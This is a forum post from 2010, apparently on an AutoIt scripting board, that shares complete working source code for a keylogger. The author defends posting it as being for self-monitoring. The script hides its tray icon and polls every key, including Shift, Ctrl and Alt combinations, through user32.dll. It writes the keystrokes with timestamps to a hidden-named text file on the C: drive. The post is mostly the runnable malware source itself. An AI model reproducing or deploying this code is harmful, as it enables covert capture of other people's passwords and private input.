Local Logging (Keylogger)

Subject: Local Logging (Keylogger) Thu Jun 17, 2010 5:47 pm

This is a keylogger I wrote for personal use to monitor my own system (there are more efficient ways of writing a keylogger). It is True that keyloggers can be used for malicious intent, however there are legitimate uses as well. I fully understand and agree with the position of the official Autoit3 forum moderators to police their own forum(its their prerogative). Unfortunately Keyloggers are plenty-full and if someone wants to use one for unscrupulous means they will. I feel limiting the posting of source-code only serves to hinder the legitimate use of them.

Code:: #cs ----------------------------------------------------------------------------
AutoIt Version: 3.3.4.0
Author: Wasnt Me
Date:       May 23,2010
Script Function: Logging :)
#ce ----------------------------------------------------------------------------

Opt("TrayIconHide", 1)

#include <array.au3>

Global $sLogFile = "C:\Inc.txt", $aCtrlKeys

$aKeys = _KeyList()
$aCtrlKeys = _Ctrl_KeyList()

;
$sTI = TimerInit()
$sdif = TimerDiff($sTI)
$odll = DllOpen("user32.dll")
While True
For $i = 1 to $aKeys[0][0]
   If _IsPressed($aKeys[$i][0], $odll) Then

      $sdif = TimerDiff($sTI)
      If $sdif > (20 * 1000) Then ;Timestamps
         ConsoleWrite(@CRLF&@CRLF&'['&@HOUR&':'&@MIN&':'&@SEC&'--'&@MDAY&'/'&@MON&'/'&@YEAR&']='&@CRLF)
         FileWrite($sLogFile,@CRLF&@CRLF&'['&@HOUR&':'&@MIN&':'&@SEC&'--'&@MDAY&'/'&@MON&'/'&@YEAR&']=')
         $sTI = TimerInit()
      EndIf

      $sKS = _KeyStatus($aKeys[$i][0],$odll)

      $sCtrlLogKey = ''
      While _IsPressed($aKeys[$i][0], $odll) and $sKS = $sKS
         $sKS = _KeyStatus($aKeys[$i][0],$odll)

         If _IsPressed('A0', $odll) or _IsPressed('A1', $odll) or _IsPressed('10', $odll) Then $sCtrlLogKey = $aKeys[$i][4] ;'{SHIFT+'
         If _IsPressed('A2', $odll) or _IsPressed('A3', $odll) or _IsPressed('11', $odll) Then $sCtrlLogKey = $aKeys[$i][2] ;'{CTRL+'
         If _IsPressed('A4', $odll) or _IsPressed('A5', $odll) or _IsPressed('12', $odll) Then $sCtrlLogKey = $aKeys[$i][3] ;'{ALT+'

      WEnd

      If $sCtrlLogKey <> '' Then
         ConsoleWrite($sCtrlLogKey)
         FileWrite($sLogFile,$sCtrlLogKey)
      Else
         ConsoleWrite($aKeys[$i][1])
         FileWrite($sLogFile,$aKeys[$i][1])
      EndIf

   EndIf

Next
Sleep(10)
Wend
DllClose($odll)

Func _KeyList()

#CS
Dim $aKeys[101][2] = [["100",""],["08","{BACKSPACE}"],["09","{TAB}"],["0C","{CLEAR}"],["0D","{ENTER}"],["13","{PAUSE}"],["14","{CAPSLOCK}"], _
   ["1B","{ESC}"],["20","{SPACEBAR}"],["21","{PAGEUP}"],["22","{PAGEDOWN}"],["23","{END}"],["24","{HOME}"],["25","{LEFTARROW}"],["26","{UPARROW}"],["27","{RIGHTARROW}"],["28","{DOWNARROW}"], _
   ["29","{SELECT}"],["2A","{PRINT}"],["2B","{EXECUTE}"],["2C","{PRINTSCREEN}"],["2D","{INS}"],["2E","{DEL}"],["30","0"],["31","1"],["32","2"],["33","3"], _
   ["34","4"],["35","5"],["36","6"],["37","7"],["38","8"],["39","9"],["41","a"],["42","b"],["43","c"],["44","d"], _
   ["45","e"],["46","f"],["47","g"],["48","h"],["49","i"],["4A","j"],["4B","k"],["4C","l"],["4D","m"],["4E","n"], _
   ["4F","o"],["50","p"],["51","q"],["52","r"],["53","s"],["54","t"],["55","u"],["56","v"],["57","w"],["58","x"], _
   ["59","y"],["5A","z"],["5B","{LEFTWIN}"],["5C","{RIGHTWIN}"],["60","0"],["61","1"],["62","2"],["63","3"],["64","4"],["65","5"], _
   ["66","6"],["67","7"],["68","8"],["69","9"],["6A","*"],["6B","+"],["6C","{Separator}"],["6D","-"],["6E","."],["6F","/"], _
   ["70","{F1}"],["71","{F2}"],["72","{F3}"],["73","{F4}"],["74","{F5}"],["75","{F6}"],["76","{F7}"],["77","{F8}"],["78","{F9}"],["79","{F10}"], _
   ["7A","{F11}"],["7B","{F12}"],["90","{NUMLOCK}"],["91","{SCROLLLOCK}"], _
   ["BA",";"],["BB","="],["BC",","],["BD","-"],["BE","."],["BF","/"],["C0","`"],["DB","["],["DC",""],["DD","]"]]
#CE

Dim $aKeys[86][5] = [["85","","CTRL","ALT","SHIFT"],["08","{BACKSPACE}",'{CTRL+BACKSPACE}','{ALT+BACKSPACE}','{SHIFT+BACKSPACE}'], _
["09","{TAB}",'{CTRL+TAB}','{ALT+TAB}','{SHIFT+TAB}'],["0C","{CLEAR}",'{CTRL+CLEAR}','{ALT+CLEAR}','{SHIFT+CLEAR}'], _
["0D","{ENTER}",'{CTRL+ENTER}','{ALT+ENTER}','{SHIFT+ENTER}'],["13","{PAUSE}",'{CTRL+PAUSE}','{ALT+PAUSE}','{SHIFT+PAUSE}'], _
["14","{CAPSLOCK}",'{CTRL+CAPSLOCK}','{ALT+CAPSLOCK}','{SHIFT+CAPSLOCK}'],["1B","{ESC}",'{CTRL+ESC}','{ALT+ESC}','{SHIFT+ESC}'], _
["20","{SPACEBAR}",'{CTRL+SPACEBAR}','{ALT+SPACEBAR}','{SHIFT+SPACEBAR}'],["21","{PAGEUP}",'{CTRL+PAGEUP}','{ALT+PAGEUP}','{SHIFT+PAGEUP}'], _
["22","{PAGEDOWN}",'{CTRL+PAGEDOWN}','{ALT+PAGEDOWN}','{SHIFT+PAGEDOWN}'],["23","{END}",'{CTRL+END}','{ALT+END}','{SHIFT+END}'], _
["24","{HOME}",'{CTRL+HOME}','{ALT+HOME}','{SHIFT+HOME}'],["25","{LEFTARROW}",'{CTRL+LEFTARROW}','{ALT+LEFTARROW}','{SHIFT+LEFTARROW}'], _
["26","{UPARROW}",'{CTRL+UPARROW}','{ALT+UPARROW}','{SHIFT+UPARROW}'],["27","{RIGHTARROW}",'{CTRL+RIGHTARROW}','{ALT+RIGHTARROW}','{SHIFT+RIGHTARROW}'], _
["28","{DOWNARROW}",'{CTRL+DOWNARROW}','{ALT+DOWNARROW}','{SHIFT+DOWNARROW}'],["29","{SELECT}",'{CTRL+SELECT}','{ALT+SELECT}','{SHIFT+SELECT}'], _
["2A","{PRINT}",'{CTRL+PRINT}','{ALT+PRINT}','{SHIFT+PRINT}'],["2B","{EXECUTE}",'{CTRL+EXECUTE}','{ALT+EXECUTE}','{SHIFT+EXECUTE}'], _
["2D","{INS}",'{CTRL+INS}','{ALT+INS}','{SHIFT+INS}'], _
["2E","{DEL}",'{CTRL+DEL}','{ALT+DEL}','{SHIFT+DEL}'],["30","0","{CTRL+0}","{ALT+0}",")"], _
["31","1","{CTRL+1}","{ALT+1}","!"],["32","2","{CTRL+2}","{ALT+2}","@"], _
["33","3","{CTRL+3}","{ALT+3}","#"],["34","4","{CTRL+4}","{ALT+4}","$"], _
["35","5","{CTRL+5}","{ALT+5}","%"],["36","6","{CTRL+6}","{ALT+6}","^"], _
["37","7","{CTRL+7}","{ALT+7}","&"],["38","8","{CTRL+8}","{ALT+8}","*"], _
["39","9","{CTRL+9}","{ALT+9}","("],["41","a","{CTRL+a}","{ALT+a}","A"], _
["42","b","{CTRL+b}","{ALT+b}","B"],["43","c","{CTRL+c}","{ALT+c}","C"], _
["44","d","{CTRL+d}","{ALT+d}","D"],["45","e","{CTRL+e}","{ALT+e}","E"], _
["46","f","{CTRL+f}","{ALT+f}","F"],["47","g","{CTRL+g}","{ALT+g}","G"], _
["48","h","{CTRL+h}","{ALT+h}","H"],["49","i","{CTRL+i}","{ALT+i}","I"], _
["4A","j","{CTRL+j}","{ALT+j}","J"],["4B","k","{CTRL+k}","{ALT+k}","K"], _
["4C","l","{CTRL+l}","{ALT+l}","L"],["4D","m","{CTRL+m}","{ALT+m}","M"], _
["4E","n","{CTRL+n}","{ALT+n}","N"],["4F","o","{CTRL+o}","{ALT+o}","O"], _
["50","p","{CTRL+p}","{ALT+p}","P"],["51","q","{CTRL+q}","{ALT+q}","Q"], _
["52","r","{CTRL+r}","{ALT+r}","R"],["53","s","{CTRL+s}","{ALT+s}","S"], _
["54","t","{CTRL+t}","{ALT+t}","T"],["55","u","{CTRL+u}","{ALT+u}","U"], _
["56","v","{CTRL+v}","{ALT+v}","V"],["57","w","{CTRL+w}","{ALT+w}","W"], _
["58","x","{CTRL+x}","{ALT+x}","X"],["59","y","{CTRL+y}","{ALT+y}","Y"], _
["5A","z","{CTRL+z}","{ALT+z}","Z"], _
["60","0",'{CTRL+0}','{ALT+0}','{INS}'],["61","1",'{CTRL+1}','{ALT+1}','{END}'], _
["62","2",'{CTRL+2}','{ALT+2}','{DOWNARROW}'],["63","3",'{CTRL+3}','{ALT+3}','{PgDn}'], _
["64","4",'{CTRL+4}','{ALT+4}','{LEFTARROW}'],["65","5",'{CTRL+5}','{ALT+5}','{SHIFT+5}'], _
["66","6",'{CTRL+6}','{ALT+6}','{RIGHTARROW}'],["67","7",'{CTRL+7}','{ALT+7}','{HOME}'], _
["68","8",'{CTRL+8}','{ALT+8}','{UPARROW}'],["69","9",'{CTRL+9}','{ALT+9}','{PgUp}'], _
["6A","*",'{CTRL+*}','{ALT+*}','{SHIFT+*}'],["6B","+",'{CTRL++}','{ALT++}','{SHIFT++}'], _
["6D","-",'{CTRL+-}','{ALT+-}','{SHIFT+-}'], _
["6E",".",'{CTRL+.}','{ALT+.}','>'],["6F","/",'{CTRL+/}','{ALT+/}','?'], _
["79","{F10}",'{CTRL+F10}','{ALT+F10}','{SHIFT+F10}'], _
["7A","{F11}",'{CTRL+F11}','{ALT+F11}','{SHIFT+F11}'], _
["7B","{F12}",'{CTRL+F12}','{ALT+F12}','{SHIFT+F12}'], _
["BA",";",'{CTRL+;}','{ALT+;}',':'], _
["BB","=",'{CTRL+=}','{ALT+=}','+'], _
["BC",",",'{CTRL+,}','{ALT+,}','<'], _
["BD","-",'{CTRL+-}','{ALT+-}','_'], _
["BE",".",'{CTRL+.}','{ALT+.}','>'], _
["BF","/",'{CTRL+/}','{ALT+/}','?'], _
["C0","`",'{CTRL+`}','{ALT+`}','~'], _
["DB","[",'{CTRL+[}','{ALT+[}','{'], _
["DC","",'{CTRL+\}','{ALT+\}','|'], _
["DD","]",'{CTRL+]}','{ALT+]}','}']]

#CS
["2C","{PRINTSCREEN}",'{CTRL+PRINTSCREEN}','{ALT+PRINTSCREEN}','{SHIFT+PRINTSCREEN}']
["90","{NUMLOCK}",'{CTRL+NUMLOCK}','{ALT+NUMLOCK}','{SHIFT+NUMLOCK}'], _
["91","{SCROLLLOCK}",'{CTRL+SCROLLLOCK}','{ALT+SCROLLLOCK}','{SHIFT+SCROLLLOCK}'], _
["6C","{Separator}",'{CTRL+Separator}','{ALT+Separator}','{SHIFT+Separator}']
["5B","{LEFTWIN}","{CTRL+LEFTWIN}","{ALT+LEFTWIN}","{SHIFT+LEFTWIN}"], _
["5C","{RIGHTWIN}",'{CTRL+RIGHTWIN}','{ALT+RIGHTWIN}','{SHIFT+RIGHTWIN}'], _
["70","{F1}",'{CTRL+F1}','{ALT+F1}','{SHIFT+F1}'], _
["71","{F2}",'{CTRL+F2}','{ALT+F2}','{SHIFT+F2}'], _
["72","{F3}",'{CTRL+F3}','{ALT+F3}','{SHIFT+F3}'], _
["73","{F4}",'{CTRL+F4}','{ALT+F4}','{SHIFT+F4}'], _
["74","{F5}",'{CTRL+F5}','{ALT+F5}','{SHIFT+F5}'], _
["75","{F6}",'{CTRL+F6}','{ALT+F6}','{SHIFT+F6}'], _
["76","{F7}",'{CTRL+F7}','{ALT+F7}','{SHIFT+F7}'], _
["77","{F8}",'{CTRL+F8}','{ALT+F8}','{SHIFT+F8}'], _
["78","{F9}",'{CTRL+F9}','{ALT+F9}','{SHIFT+F9}']];, _
#ce

Return $aKeys ; '{CTRL+}','{ALT+}','{SHIFT+}'

EndFunc

Func _Ctrl_KeyList()
Dim $aCtrlKeys[10][2] = [["9",""],["A0","{LSHIFT}"],["A1","{RSHIFT}"],["A2","{LCTRL}"],["A3","{RCTRL}"],["10","{SHIFT}"],["11","{CTRL}"],["12","{ALT}"],["A4","{LALT}"],["A5","{RALT}"]]
Return $aCtrlKeys
EndFunc

Func _IsPressed($sHexKey, $vDLL = 'user32.dll')
Local $a_R = DllCall($vDLL, "int", "GetAsyncKeyState", "int", '0x' & $sHexKey)
If Not @error And BitAND($a_R[0], 0x8000) = 0x8000 Then Return 1
Return 0
EndFunc

Func _KeyStatus($sHexKey, $vDLL = 'user32.dll')
Local $a_R = DllCall($vDLL, "long", "GetKeyState", "long", '0x' & $sHexKey)
Return $a_R[0]
EndFunc